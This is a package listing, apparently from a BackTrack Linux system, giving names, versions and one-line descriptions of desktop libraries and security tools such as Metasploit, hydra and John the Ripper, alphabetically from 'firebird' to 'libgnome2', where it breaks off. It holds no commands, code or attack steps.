ii  firebird2.1-common  2.1.3.18185-0.ds1-6build1  common files for firebird 2.1 servers and clients
ii  firebird2.1-common-doc  2.1.3.18185-0.ds1-6build1  copyright, licensing and changelogs of firebird2.1
ii  firefox  4.0.1-bt0  Firefox web browser
ii  firefox-user-profile  1.0-bt2  Firefox profile
ii  flashplugin-installer  10.2.159.1ubuntu0.10.04.1  Adobe Flash Player plugin installer
ii  fontconfig  2.8.0-2ubuntu1  generic font configuration library - support binaries
ii  fontconfig-config  2.8.0-2ubuntu1  generic font configuration library - configuration
ii  foomatic-db  20100216-0ubuntu3  OpenPrinting printer support - database
ii  foomatic-db-engine  4.0.4-0ubuntu1  OpenPrinting printer support - programs
ii  foomatic-filters  4.0.4-0ubuntu1  OpenPrinting printer support - filters
ii  foremost  1.5.7-bt0  A console program to recover files based on their headers, footers, and internal data structures.
ii  fping  2.4b2-bt0  A ping-like program which uses the Internet Control Message Protocol (ICMP) echo request to determine if a host is up.
ii  fragroute  1.2-bt1  fragroute intercepts, modifies, and rewrites egress traffic destined for a specified host
ii  fragrouter  1.6-bt3  Fragrouter is a network intrusion detection evasion toolkit.
ii  framework2  2.8-bt0  A powerful exploitation framework.
ii  framework3  3.7.0-bt1  Metasploit Exploitation Framework
ii  freeradius-wpe  2.1.7-bt1  A patch for the popular open-source FreeRADIUS implementation to demonstrate RADIUS impersonation vulnerabilities by Joshua Wright and Brad Antoniewicz, d
ii  freetds-common  0.82-6build1  configuration files for FreeTDS SQL client libraries
ii  friendly-recovery  0.2.10  Make recovery more user-friendly
ii  ftester  1.0-bt0  A tool designed for testing firewall filtering policies and Intrusion Detection System (IDS) capabilities.
ii  ftp  0.17-19build1  The FTP client
ii  funkload  1.16.0-bt0  FunkLoad is a functional and load web tester, written in Python
ii  fuse-utils  2.8.1-1.1ubuntu3.1  Filesystem in USErspace (utilities)
ii  fvwm1  1.24r-54  Old version of the F(?) Virtual Manager
ii  g++  4:4.4.3-1ubuntu1  The GNU C++ compiler
ii  g++-4.4  4.4.3-4ubuntu5  The GNU C++ compiler
ii  galleta  1.0+20040505-5  An Internet Explorer cookie forensic analysis tool
ii  gamin  0.1.10-1ubuntu3  File and directory monitoring system
ii  gawk  1:3.1.6.dfsg-4build1  GNU awk, a pattern scanning and processing language
ii  gcc  4:4.4.3-1ubuntu1  The GNU C compiler
ii  gcc-4.4  4.4.3-4ubuntu5  The GNU C compiler
ii  gcc-4.4-base  4.4.3-4ubuntu5  The GNU Compiler Collection (base package)
ii  gconf2  2.28.1-0ubuntu1  GNOME configuration database system (support tools)
ii  gconf2-common  2.28.1-0ubuntu1  GNOME configuration database system (common files)
ii  gedit  2.30.3-0ubuntu0.1  official text editor of the GNOME desktop environment
ii  gedit-common  2.30.3-0ubuntu0.1  official text editor of the GNOME desktop environment (support files)
ii  genisoimage  9:1.1.10-1ubuntu1  Creates ISO-9660 CD-ROM filesystem images
ii  geoip-database  1.4.6.dfsg-17  IP lookup command line tools that use the GeoIP library (country database)
ii  gerix-wifi-cracker-ng  2.0-bt2  Aicrack-NG (WPA/WEP) GUI with pyrit support on cracking
ii  gettext  0.17-8ubuntu3  GNU Internationalization utilities
ii  gettext-base  0.17-8ubuntu3  GNU Internationalization utilities for the base system
ii  ghdb  1.0-bt1  Firefox link to GHDB.
ii  ghostscript  8.71.dfsg.1-0ubuntu5.3  The GPL Ghostscript PostScript/PDF interpreter
ii  ghostscript-cups  8.71.dfsg.1-0ubuntu5.3  The GPL Ghostscript PostScript/PDF interpreter - CUPS filters
ii  gir1.0-atk-1.0  1.30.0-0ubuntu2.1  The ATK accessibility toolkit
ii  gir1.0-clutter-1.0  1.2.4-0ubuntu1  GObject introspection data for the Clutter 1.0 library
ii  gir1.0-freedesktop  0.6.8-1  Introspection data for some FreeDesktop components
ii  gir1.0-glib-2.0  0.6.8-1  Introspection data for GLib, GObject, Gio and GModule
ii  gir1.0-gtk-2.0  2.20.1-0ubuntu2  The GTK+ graphical user interface library
ii  gir1.0--2.28  2.28.1~git20091208-1ubuntu7  GObject introspection data for Mutter
ii  gir1.0-pango-1.0  1.28.0-0ubuntu2.2  Layout and rendering of internationalized text
ii  giskismet  1.0-bt2  GISKismet is a wireless recon visualization tool to represent data gathered using Kismet in a flexible manner. GISKismet stores the information in a datab
ii  git-core  1:1.7.0.4-1ubuntu0.2  fast, scalable, distributed revision control system
ii  gksu  2.0.2-2ubuntu2  graphical frontend to su
ii  globalplatform  6.0.0-bt0  The GlobalPlatform card specification is a standard for the management of the contents on a smart card. Mainly this comprises the installation and the rem
ii  gnome-about  1:2.30.2-0ubuntu1  The GNOME about box
ii  gnome-applets  2.30.0-0ubuntu2  Various applets for the GNOME panel - binary files
ii  gnome-applets-data  2.30.0-0ubuntu2  Various applets for the GNOME panel - data files
ii  gnome-control-center  1:2.30.1-0ubuntu1  utilities to configure the GNOME desktop
ii  gnome-core  1:2.28+1ubuntu3  The GNOME Desktop Environment -- essential components
ii  gnome-desktop-data  1:2.30.2-0ubuntu1  Common files for GNOME desktop apps
ii  gnome-doc-utils  0.20.0-0ubuntu2  a collection of documentation utilities for the GNOME project
ii  gnome-exe-thumbnailer  0.7-0ubuntu1~lucid1  Wine .exe and other executable thumbnailer for Gnome
ii  gnome-extra-icons  1.1-2  Optional GNOME icons
ii  gnome-icon-theme  2.28.0-1ubuntu1  GNOME Desktop icon theme
ii  gnome-keyring  2.92.92.is.2.30.3-0ubuntu1.1  GNOME keyring services (daemon and tools)
ii  gnome-media  2.30.0-0ubuntu1  GNOME media utilities
ii  gnome-media-common  2.30.0-0ubuntu1  GNOME media utilities - common files
ii  gnome-menus  2.30.0-0ubuntu4  an implementation of the freedesktop menu specification for GNOME
ii  gnome-mime-data  2.18.0-1  base MIME and Application database for GNOME.
ii  gnome-panel  1:2.30.2-0ubuntu0.2  launcher and docking facility for GNOME
ii  gnome-panel-data  1:2.30.2-0ubuntu0.2  common files for the GNOME Panel
ii  gnome-power-manager  2.30.0-0ubuntu1  power management tool for the GNOME desktop
ii  gnome-session  2.30.0-0ubuntu1  The GNOME Session Manager
ii  gnome-session-bin  2.30.0-0ubuntu1  The GNOME Session Manager - Minimal runtime
ii  gnome-settings-daemon  2.30.1-0ubuntu1.1  daemon handling the GNOME session settings
ii  gnome-shell  2.28.1~git20091125-1ubuntu0.2  graphical shell for the GNOME desktop
ii  gnome-system-monitor  2.28.0-1ubuntu2  Process viewer and system resource monitor for GNOME
ii  gnome-terminal  2.30.2-0ubuntu1  The GNOME terminal emulator application
ii  gnome-terminal-data  2.30.2-0ubuntu1  Data files for the GNOME terminal emulator
ii  gnome-themes-ubuntu  0.6.1  Ubuntu community themes
ii  gnome-user-guide  2.30.0+git20100403ubuntu2  GNOME user's guide
ii  gnupg  1.4.10-2ubuntu1  GNU privacy guard - a free PGP replacement
ii  gnupg-curl  1.4.10-2ubuntu1  GNU privacy guard - a free PGP replacement (cURL)
ii  gnuplot  4.2.6-1  A command-line driven interactive plotting program
ii  gnuplot-nox  4.2.6-1  A command-line driven interactive plotting program
ii  gnuplot-x11  4.2.6-1  A command-line driven interactive plotting program
ii  goohost  0.0.1-bt1  Simple script that extracts hosts/subdomains, ip or emails for a specific domain with Google search.
ii  gooscan  1.0-bt2  Gooscan is a tool developed by Johny Long. It automates queries against Google search appliances with the goal to identify vulnerabilities on web sites.
ii  gpgv  1.4.10-2ubuntu1  GNU privacy guard - signature verification tool
ii  gpsd  2.92-4  Global Positioning System - daemon
ii  gpshell  1.4.4-bt0  GPshell for Globalplatform
ii  grabber  0.1-bt1  Grabber is a web application scanner.
ii  graphviz  2.20.2-8ubuntu3  rich set of graph drawing tools
ii  grendel-scan  1.0-bt1  Grendel-Scan is an open-source web application security testing tool.
ii  grep  2.5.4-4build1  GNU grep, egrep and fgrep
ii  groff  1.20.1-7  GNU troff text-formatting system
ii  groff-base  1.20.1-7  GNU troff text-formatting system (base system components)
ii  grub-common  1.98-1ubuntu12  GRand Unified Bootloader, version 2 (common files)
ii  grub-pc  1.98-1ubuntu12  GRand Unified Bootloader, version 2 (PC/BIOS version)
ii  gsfonts  1:8.11+urwcyr1.0.7~pre44-4  Fonts for the Ghostscript interpreter(s)
ii  gstreamer0.10-plugins-base  0.10.28-1  GStreamer plugins from the "base" set
ii  gstreamer0.10-plugins-good  0.10.21-1ubuntu3  GStreamer plugins from the "good" set
ii  gstreamer0.10-pulseaudio  0.10.21-1ubuntu3  GStreamer plugin for PulseAudio
ii  gstreamer0.10-x  0.10.28-1  GStreamer plugins for X11 and Pango
ii  gtk2-engines  1:2.20.0-0ubuntu1  theme engines for GTK+ 2.x
ii  gtk2-engines-murrine  0.90.3+git20100323-0ubuntu3  cairo-based gtk+-2.0 theme engine
ii  gtk2-engines-pixbuf  2.20.1-0ubuntu2  Pixbuf-based theme for GTK+ 2.x
ii  gvfs  1.6.1-0ubuntu1build1  userspace virtual filesystem - server
ii  gvfs-backends  1.6.1-0ubuntu1build1  userspace virtual filesystem - backends
ii  gzip  1.3.12-9ubuntu1.1  GNU compression utilities
ii  hack-library  1.0-bt2  A collection of tools used for SIP attack tools.
ii  hashcat  0.36-bt4  cpu based multihash cracker
ii  hashcat-utils  0.3-bt3  Utilities for creating and manipulation wordlists
ii  hdparm  9.15-1ubuntu9  tune hard disk parameters for high performance
ii  hexedit  1.2.12-bt0  View and edit files in hexadecimal or in ASC II.
ii  hexinject  1.2-bt1  HexInject is a very versatile packet injector and sniffer, that provide a command-line framework for raw network access.
ii  hicolor-icon-theme  0.11-1  default fallback theme for FreeDesktop.org icon themes
ii  honeycomb  0.7-bt6  Automated signature creation using honeypots.
ii  honeyd  1.5c-bt3  Honeyd is a small daemon that creates virtual hosts on a network.
ii  hostname  3.03ubuntu1  utility to set/show the host name or domain name
ii  hpijs  3.10.2-2ubuntu2.2  HP Linux Printing and Imaging - gs IJS driver (hpijs)
ii  hping2  2.0.0-rc3-bt2  hping is a command-line oriented TCP/IP packet assembler/analyzer.
ii  hping3  20051105-bt2  hping is a command-line oriented TCP/IP packet assembler/analyzer. The interface is inspired to the ping(8) unix command, but hping isn't only able to sen
ii  httprint  301-bt2  httprint is a web server fingerprinting tool. It relies on web server characteristics to accurately identify web servers, despite the fact that they may h
ii  humanity-icon-theme  0.5.2.1  Humanity Icon theme
ii  hunspell-en-us  20070829-4ubuntu1  English_american dictionary for hunspell
ii  hydra  6.3-bt6  A very fast network logon cracker which support many different services.
ii  iaxflood  1.0-bt0  A UDP Inter-Asterisk_eXchange (i.e. IAX)
ii  icedtea-6-jre-cacao  6b20-1.9.7-0ubuntu1~10.04.1  Alternative JVM for OpenJDK, using Cacao
ii  icoutils  0.29.1-0ubuntu1~lucid  Create and extract MS Windows icons and cursors
ii  ida-pro-free  5.0-bt3  The IDA Pro Disassembler and Debugger is an interactive, programmable, extendible, multi-processor disassembler hosted on Windows, Linux, or Mac OS X.
ii  ifupdown  0.6.8ubuntu29.2  high level tools to configure network interfaces
ii  iisemulator  0.95-3  Emulation for the IIS web server
ii  ike-scan  1.9-bt2  ike-scan is a command-line tool that uses the IKE protocol to discover, fingerprint and test IPsec VPN servers.
ii  imagemagick  7:6.5.7.8-1ubuntu1.1  image manipulation programs
ii  impacket-examples  0.9.6.0-bt1  A collection of Python classes focused on providing access to network packets.
ii  indicator-applet  0.3.7-0ubuntu1  GNOME panel indicator applet
ii  indicator-application  0.0.19-0ubuntu4  Application Indicators
ii  indicator-messages  0.3.6-0ubuntu2  GNOME panel indicator applet for messages
ii  indicator-sound  0.2.6-0ubuntu1  A system sound indicator.
ii info 4.13a.dfsg.1-5ubuntu1 Standalone GNU Info documentation browser ii initramfs-tools 0.92bubuntu78 tools for generating an initramfs ii initramfs-tools-bin 0.92bubuntu78 binaries used by initramfs-tools ii initscripts 2.87dsf-4ubuntu17.2 scripts for initializing and shutting down the system ii insserv 1.12.0-14 Tool to organize boot sequence using LSB init.d script dependencies ii install-info 4.13a.dfsg.1-5ubuntu1 Manage installed documentation in info format ii installation-report 2.39ubuntu4 system installation report ii intel-gpu-tools 1.0.2+git20100324-0ubuntu1 tools for debugging the Intel graphics driver ii intltool 0.41.0-0ubuntu1 Utility scripts for internationalizing XML ii intltool-debian 0.35.0+20060710.1 Help i18n of RFC822 compliant config files ii inviteflood 2.0-bt1 Command line tool to attempt to flood a specific destination. ii iodine 0.6.0-rc1-bt2 This is a piece of software that lets you tunnel IPv4 data through a DNS server. This can be usable in different situations where internet access is firew ii ipcalc 0.41-bt1 IPv4 Calculator ii iproute 20091226-1 networking and traffic control tools ii iptables 1.4.4-2ubuntu2 administration tools for packet filtering and NAT ii iputils-ping 3:20071127-2ubuntu1 Tools to test the reachability of network hosts ii iputils-tracepath 3:20071127-2ubuntu1 Tools to trace the network path to a remote host ii irb 4.2-2~uorppa0 Interactive Ruby (irb) ii irb1.8 1.8.7.249-2 Interactive Ruby (for Ruby 1.8) ii irb1.9.2 1.9.2.z1-1ppa1~lucid Interactive Ruby (for Ruby 1.9.2) ii irpas 0.10-bt1 The idea is to implement small tools which can be scripted for larger tests while using the protocols describd in standards or white papers. IRPAS is not ii irqbalance 0.55+20091017-3ubuntu2 Daemon to balance interrupts for SMP systems ii iso-codes 3.12.1-1 ISO language, territory, currency, script codes and their translations ii iw 0.9.22-bt2 iw is a new nl80211 based CLI configuration utility for wireless devices. 
ii iwar 0.08-bt1 iWar is a "war dialer" written completely in C for Unix types of operating systems (Linux, FreeBSD, OpenBSD, etc). It is intended for legal phone security ii java-common 0.34 Base of all Java packages ii john 1.7.6-jumbo-12-bt5 John the Ripper is a fast password cracker. Besides several crypt(3) password hash types most commonly found on various Unix flavors, supported out of the ii joomscan 0.0.4-bt2 Detects file inclusion, sql injection, command execution vulnerabilities of a target Joomla! web site. ii kbd 1.15-1ubuntu3 Linux console font and keytable utilities ii keepnote 0.7.1-bt0 A note taking and organization application. ii kernel-package 12.032 A utility for building Linux kernel related Debian packages. ii keyutils 1.2-12 Linux Key Management Utilities ii kismet 201103r2-bt1 An 802.11 layer2 wireless network detector, sniffer, and intrusion detection system. ii klibc-utils 1.5.17-4ubuntu1 small utilities built with klibc for early boot ii lame 3.98.2+debian-0ubuntu3 An MP3 encoding library (frontend) ii landscape-common 11.02-0ubuntu0.10.04.1 The Landscape administration system client ii language-pack-en 1:10.04+20110204 translation updates for language English ii language-pack-en-base 1:10.04+20110204 translations for language English ii language-selector-common 0.5.8 Language selector for Ubuntu Linux ii lanmap2 1.0-bt1 Builds database/visualizations of LAN structure from passively sifted information. ii laptop-detect 0.13.7ubuntu2 attempt to detect a laptop ii launchpad-integration 0.1.35 launchpad integration ii lbd 0.2-bt2 lbd (load balancing detector) detects if a given domain uses DNS and/or HTTP Load-Balancing. 
ii less 436-1 pager program similar to more ii libaa1 1.4p5-38build1 asc ii art library ii libaccess-bridge-java 1.26.2-3 Java Access Bridge for GNOME ii libaccess-bridge-java-jni 1.26.2-3 Java Access Bridge for GNOME (jni bindings) ii libacl1 2.2.49-2 Access control list shared library ii libamd2.2.0 1:3.4.0-1ubuntu3 approximate minimum degree ordering library for sparse matrices ii libao2 0.8.8-5ubuntu2 Cross Platform Audio Output Library ii libapache2-mod-php5 5.3.2-1ubuntu4.9 server-side, HTML-embedded scripting language (Apache 2 module) ii libapparmor-perl 2.5.1-0ubuntu0.10.04.3 AppArmor library Perl bindings ii libapparmor1 2.5.1-0ubuntu0.10.04.3 changehat AppArmor library ii libappindicator0 0.0.19-0ubuntu4 Application Indicators ii libapr1 1.3.8-1build1 The Apache Portable Runtime Library ii libaprutil1 1.3.9+dfsg-3ubuntu0.10.04.1 The Apache Portable Runtime Utility Library ii libaprutil1-dbd-sqlite3 1.3.9+dfsg-3ubuntu0.10.04.1 The Apache Portable Runtime Utility Library - SQLite3 Driver ii libaprutil1-ldap 1.3.9+dfsg-3ubuntu0.10.04.1 The Apache Portable Runtime Utility Library - LDAP Driver ii libarchive1 2.8.0-2 Single library to read/write tar, cpio, pax, zip, iso9660, etc. ii libart-2.0-2 2.3.20-2build1 Library of functions for 2D graphics - runtime files ii libasound2 1.0.22-0ubuntu7 shared library for ALSA applications ii libasound2-dev 1.0.22-0ubuntu7 shared library for ALSA applications -- development files ii libasound2-plugins 1.0.22-0ubuntu6 ALSA library additional plugins ii libaspell15 0.60.6-3ubuntu1 GNU Aspell spell-checker runtime library ii libast2 0.7-3 the Library of Assorted Spiffy Things ii libatasmart4 0.17+git20100219-1git2 ATA S.M.A.R.T. 
reading and parsing library ii libatk1.0-0 1.30.0-0ubuntu2.1 The ATK accessibility toolkit ii libatk1.0-data 1.30.0-0ubuntu2.1 Common files for the ATK accessibility toolkit ii libatm1 1:2.5.1-1.2 shared library for ATM (Asynchronous Transfer Mode) ii libatspi1.0-0 1.30.1-0ubuntu1 C binding libraries of at-spi for GNOME Accessibility ii libattr1 1:2.4.44-1 Extended attribute shared library ii libaudio2 1.9.2-3 Network Audio System - shared libraries ii libaudiofile0 0.2.6-8ubuntu1 Open-source version of SGI's audiofile library ii libavahi-client3 0.6.25-1ubuntu6.2 Avahi client library ii libavahi-common-data 0.6.25-1ubuntu6.2 Avahi common data files ii libavahi-common3 0.6.25-1ubuntu6.2 Avahi common library ii libavahi-compat-libdnssd1 0.6.25-1ubuntu6.2 Avahi Apple Bonjour compatibility library ii libavahi-core6 0.6.25-1ubuntu6.2 Avahi's embeddable mDNS/DNS-SD library ii libavahi-glib1 0.6.25-1ubuntu6.2 Avahi glib integration library ii libavc1394-0 0.5.3-1build4 control IEEE 1394 audio/video devices ii libavcodec52 4:0.5.1-1ubuntu1.1 ffmpeg codec library ii libavformat52 4:0.5.1-1ubuntu1.1 ffmpeg file format library ii libavutil49 4:0.5.1-1ubuntu1.1 ffmpeg utility library ii libbfb0 0.23-1 bfb protocol library ii libbind9-60 1:9.7.0.dfsg.P1-1ubuntu0.1 BIND9 Shared Library used by BIND ii libblas3gf 1.2-2build1 Basic Linear Algebra Subroutines 3, shared library ii libblkid1 2.17.2-0ubuntu1.10.04.2 block device id library ii libbluetooth3 4.60-0ubuntu8 Library to use the BlueZ Linux Bluetooth stack ii libbonobo2-0 2.24.3-0ubuntu1 Bonobo CORBA interfaces library ii libbonobo2-common 2.24.3-0ubuntu1 Bonobo CORBA interfaces library -- support files ii libbonoboui2-0 2.24.3-0ubuntu1 The Bonobo UI library ii libbonoboui2-common 2.24.3-0ubuntu1 The Bonobo UI library -- common files ii libboost-filesystem1.40.0 1.40.0-4ubuntu4 filesystem operations (portable paths, iteration over directories, etc) in C++ ii libboost-python1.40.0 1.40.0-4ubuntu4 Boost.Python Library ii 
libboost-regex1.40.0 1.40.0-4ubuntu4 regular expression library for C++ ii libboost-system1.40.0 1.40.0-4ubuntu4 (e.g. diagnostics support) library ii libboost-thread1.40.0 1.40.0-4ubuntu4 portable C++ multi-threading ii libbsd0 0.2.0-1 utility functions from BSD systems - shared library ii libbz2-1.0 1.0.5-4ubuntu0.1 high-quality block-sorting file compressor library - runtime ii libc-ares2 1.7.0-1 library for asyncronous name resolves ii libc-bin 2.11.1-0ubuntu7.8 Embedded GNU C Library: Binaries ii libc-dev-bin 2.11.1-0ubuntu7.8 Embedded GNU C Library: Development binaries ii libc6 2.11.1-0ubuntu7.8 Embedded GNU C Library: Shared libraries ii libc6-dev 2.11.1-0ubuntu7.8 Embedded GNU C Library: Development Libraries and Header Files ii libc6-i686 2.11.1-0ubuntu7.8 GNU C Library: Shared libraries [i686 optimized] ii libcaca0 0.99.beta16-3 colour ASC II art library ii libcairo2 1.8.10-2ubuntu1 The Cairo 2D vector graphics library ii libcairomm-1.0-1 1.8.4-0ubuntu1 C++ wrappers for Cairo (shared libraries) ii libcamel1.2-14 2.28.3.1-0ubuntu6 The Evolution MIME message handling library ii libcanberra-gtk-module 0.22-1ubuntu2 translates Gtk+ widgets signals to event sounds ii libcanberra-gtk0 0.22-1ubuntu2 Gtk+ helper for playing widget event sounds with libcanberra ii libcanberra0 0.22-1ubuntu2 a simple abstract interface for playing event sounds ii libcap-ng0 0.6.2-4 An alternate posix capabilities library ii libcap2 1:2.17-2ubuntu1 support for getting/setting POSIX.1e capabilities ii libcap2-bin 1:2.17-2ubuntu1 basic utility programs for using capabilities ii libccid 1.3.11-1 PC/SC driver for USB CCID smart card readers ii libcdio-cdda0 0.81-4 library to read and control digital audio CDs ii libcdio-paranoia0 0.81-4 library to read digital audio CDs with error correction ii libcdio10 0.81-4 library to read and control CD-ROM ii libcdparanoia0 3.10.2+debian-9 audio extraction tool for sampling CDs (library) ii libck-connector0 0.4.1-3ubuntu2 ConsoleKit libraries ii 
libclass-accessor-perl 0.34-1 Perl module that automatically generates accessors ii libclutter-1.0-0 1.2.4-0ubuntu1 Open GL based interactive canvas library ii libcomerr2 1.41.11-1ubuntu2.1 common error description library ii libcroco3 0.6.2-1 a generic Cascading Style Sheet (CSS) parsing and manipulation toolkit ii libcups2 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - Core library ii libcupscgi1 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - CGI library ii libcupsdriver1 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - Driver library ii libcupsimage2 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - Raster image library ii libcupsmime1 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - MIME library ii libcupsppdc1 1.4.3-1ubuntu1.4 Common UNIX Printing System(tm) - PPD manipulation library ii libcurl3 7.19.7-1ubuntu1 Multi-protocol file transfer library (OpenSSL) ii libcurl3-gnutls 7.19.7-1ubuntu1 Multi-protocol file transfer library (GnuTLS) ii libcurses-perl 1.28-1 Curses interface for Perl ii libcurses-ui-perl 0.9607-1 curses-based OO user interface framework for Perl ii libcwidget3 0.5.13-1ubuntu1 high-level terminal interface library for C++ (runtime files) ii libdaemon0 0.14-2 lightweight C library for daemons - runtime library ii libdatrie1 0.2.2-3 Double-array trie library ii libdb4.6 4.6.21-16 Berkeley v4.6 Database Libraries [runtime] ii libdb4.8 4.8.24-1ubuntu1 Berkeley v4.8 Database Libraries [runtime] ii libdbd-mysql-perl 4.012-1ubuntu1 A Perl5 database interface to the MySQL database ii libdbd-sqlite3-perl 1.29-1 Perl DBI driver with a self-contained RDBMS ii libdbi-perl 1.609-1build1 Perl Database Interface (DBI) ii libdbus-1-3 1.2.16-2ubuntu4.2 simple interprocess messaging system ii libdbus-glib-1-2 0.84-1 simple interprocess messaging system (GLib-based shared library) ii libdbusmenu-glib1 0.2.9-0ubuntu3.1 Menus over DBus shared library for glib ii libdbusmenu-gtk1 0.2.9-0ubuntu3.1 Menus over DBus shared library for GTK ii 
libdebconfclient0 0.147 Debian Configuration Management System (C-implementation) ii libdebian-installer4 0.68ubuntu3 Library of common debian-installer functions ii libdevkit-power-gobject1 1:0.9.1-1 abstraction for power management - shared library (old ABI) ii libdevmapper1.02.1 2:1.02.39-1ubuntu4.1 The Linux Kernel Device Mapper userspace library ii libdigest-hmac-perl 1.01-7 create standard message integrity checks ii libdigest-sha1-perl 2.12-1build1 NIST SHA-1 message digest algorithm ii libdirectfb-1.2-0 1.2.8-5ubuntu2 direct frame buffer graphics - shared libraries ii libdiscover2 2.1.2-3 hardware identification library ii libdjvulibre-text 3.5.22-1ubuntu4.1 Linguistic support files for libdjvulibre ii libdjvulibre21 3.5.22-1ubuntu4.1 Runtime support for the DjVu image format ii libdmraid1.0.0.rc16 1.0.0.rc16-3ubuntu2 Device-Mapper Software RAID support tool - shared library ii libdnet 2.49ubuntu1 DECnet Libraries ii libdnet-dev 2.49ubuntu1 DECnet development libraries & Headers ii libdns64 1:9.7.0.dfsg.P1-1ubuntu0.1 DNS Shared Library used by BIND ii libdrm-intel1 2.4.18-1ubuntu3 Userspace interface to intel-specific kernel DRM services -- runtime ii libdrm-nouveau1 2.4.18-1ubuntu3 Userspace interface to nouveau-specific kernel DRM services -- runtime ii libdrm-radeon1 2.4.18-1ubuntu3 Userspace interface to radeon-specific kernel DRM services -- runtime ii libdrm2 2.4.18-1ubuntu3 Userspace interface to kernel DRM services -- runtime ii libdumbnet-dev 1.12-3 A dumb, portable networking library -- development files ii libdumbnet1 1.12-3 A dumb, portable networking library -- shared library ii libdv4 1.0.0-2ubuntu2 software library for DV format digital video (runtime lib) ii libebackend1.2-0 2.28.3.1-0ubuntu6 Utility library for evolution data servers ii libebook1.2-9 2.28.3.1-0ubuntu6 Client library for evolution address books ii libecal1.2-7 2.28.3.1-0ubuntu6 Client library for evolution calendars ii libecryptfs0 83-0ubuntu3.1 ecryptfs cryptographic 
filesystem (library) ii libedata-book1.2-2 2.28.3.1-0ubuntu6 Backend library for evolution address books ii libedata-cal1.2-6 2.28.3.1-0ubuntu6 Backend library for evolution calendars ii libedataserver1.2-11 2.28.3.1-0ubuntu6 Utility library for evolution data servers ii libedataserverui1.2-8 2.28.3.1-0ubuntu6 GUI utility library for evolution data servers ii libedit2 2.11-20080614-1build1 BSD editline and history libraries ii libeggdbus-1-0 0.6-1 D-Bus bindings for GObject ii libegroupwise1.2-13 2.28.3.1-0ubuntu6 Client library for accessing groupwise POA through SOAP interface ii libelf1 0.143-1 library to read and write ELF files ii libenchant1c2a 1.6.0-0ubuntu1 a wrapper library for various spell checker engines ii libept0 0.5.30 High-level library for managing Debian package information ii liberror-perl 0.17-1 Perl module for error/exception handling in an OO-ish way ii libesd0 0.2.41-6ubuntu1 Enlightened Sound Daemon - Shared libraries ii libestools1.2 1:1.2.96~beta-6 Edinburgh Speech Tools Library ii libevent-1.4-2 1.4.13-stable-1 An asynchronous event notification library ii libevent-core-1.4-2 1.4.13-stable-1 An asynchronous event notification library (core) ii libevent-dev 1.4.13-stable-1 Development libraries, header files and docs for libevent ii libevent-extra-1.4-2 1.4.13-stable-1 An asynchronous event notification library (extra) ii libewf1 20100119-1 library with support for Expert Witness Compression Format ii libexempi3 2.1.1-1build2 library to parse XMP metadata (Library) ii libexif12 0.6.19-1 library to parse EXIF files ii libexiv2-6 0.19-1 EXIF/IPTC metadata manipulation library ii libexpat1 2.0.1-7ubuntu1 XML parsing C library - runtime library ii libextractor-plugins 0.5.23+dfsg-4build1 extracts meta-data from files of arbitrary type (plugins) ii libextractor1c2a 0.5.23+dfsg-4build1 extracts meta-data from files of arbitrary type (library) ii libfbclient2 2.1.3.18185-0.ds1-6build1 Firebird client library ii libffi5 3.0.9-1 Foreign Function 
Interface library runtime ii libfile-copy-recursive-perl 0.38-1 Perl extension for recursively copying files and directories ii libfile-homedir-perl 0.86-1 Get the home directory for yourself or other users in Perl ii libfile-which-perl 1.08-1 Perl module for searching paths for executable programs ii libflac8 1.2.1-2build2 Free Lossless Audio Codec - runtime C library ii libfont-afm-perl 1.20-1 Font::AFM - Interface to Adobe Font Metrics files ii libfontconfig1 2.8.0-2ubuntu1 generic font configuration library - runtime ii libfontenc1 1:1.0.5-1 X11 font encoding library ii libfreetype6 2.3.11-1ubuntu2.4 FreeType 2 font engine, shared library files ii libfribidi0 0.19.2-1 Free Implementation of the Unicode BiDi algorithm ii libfs6 2:1.0.2-1build1 X11 Font Services library ii libfuse2 2.8.1-1.1ubuntu3.1 Filesystem in USErspace library ii libgail18 2.20.1-0ubuntu2 GNOME Accessibility Implementation Library -- shared libraries ii libgamin0 0.1.10-1ubuntu3 Client library for the gamin file and directory monitoring system ii libgc1c2 1:6.8-1.2ubuntu1 conservative garbage collector for C and C++ ii libgcc1 1:4.4.3-4ubuntu5 GCC support library ii libgconf2-4 2.28.1-0ubuntu1 GNOME configuration database system (shared libraries) ii libgcr0 2.92.92.is.2.30.3-0ubuntu1.1 Library for Crypto UI related task - runtime ii libgcrypt11 1.4.4-5ubuntu2 LGPL Crypto library - runtime library ii libgd2-noxpm 2.0.36~rc1~dfsg-3.1ubuntu1 GD Graphics Library version 2 (without XPM support) ii libgdata-google1.2-1 2.28.3.1-0ubuntu6 Client library for accessing Google POA through SOAP interface ii libgdata1.2-1 2.28.3.1-0ubuntu6 Client library for accessing Google POA through SOAP interface ii libgdbm3 1.8.3-9 GNU dbm database routines (runtime version) ii libgdu0 2.30.1-1 GObject based Disk Utility Library ii libgeoip1 1.4.6.dfsg-17 A non-DNS IP-to-country resolver library ii libgfortran3 4.4.3-4ubuntu5 Runtime library for GNU Fortran applications ii libgif-dev 4.1.6-9 library for GIF images 
(development) ii libgif4 4.1.6-9 library for GIF images (library) ii libgirepository1.0-0 0.6.8-1 Library for handling GObject introspection data (runtime library) ii libgjs0 0.5-1ubuntu2.3 Mozilla-based javascript bindings for the GNOME platform ii libgksu2-0 2.0.13~pre1-1ubuntu4.1 library providing su and sudo functionality ii libgl1-mesa-dri 7.7.1-1ubuntu3 A free implementation of the OpenGL API -- DRI modules ii libgl1-mesa- 7.7.1-1ubuntu3 A free implementation of the OpenGL API -- GLX runtime ii libglade2-0 1:2.6.4-1build1 library to load .glade files at runtime ii libglib2.0-0 2.24.1-0ubuntu1 The GLib library of C routines ii libglib2.0-data 2.24.1-0ubuntu1 Common files for GLib library ii libglibmm-2.4-1c2a 2.24.2-0ubuntu1 C++ wrapper for the GLib toolkit (shared libraries) ii libglu1-mesa 7.7.1-1ubuntu3 The OpenGL utility library (GLU) ii libgmp3c2 2:4.3.2+dfsg-1ubuntu1 Multiprecision arithmetic library ii libgnome-desktop-2-17 1:2.30.2-0ubuntu1 Utility library for loading .desktop files - runtime files ii libgnome-keyring0 2.30.1-0ubuntu1 GNOME keyring services library ii libgnome-media0 2.30.0-0ubuntu1 runtime libraries for the GNOME media utilities ii libgnome-menu2 2.30.0-0ubuntu4 an implementation of the freedesktop menu specification for GNOME ii libgnome-window-settings1 1:2.30.1-0ubuntu1 Utility library for getting window manager settings ii libgnome2-0 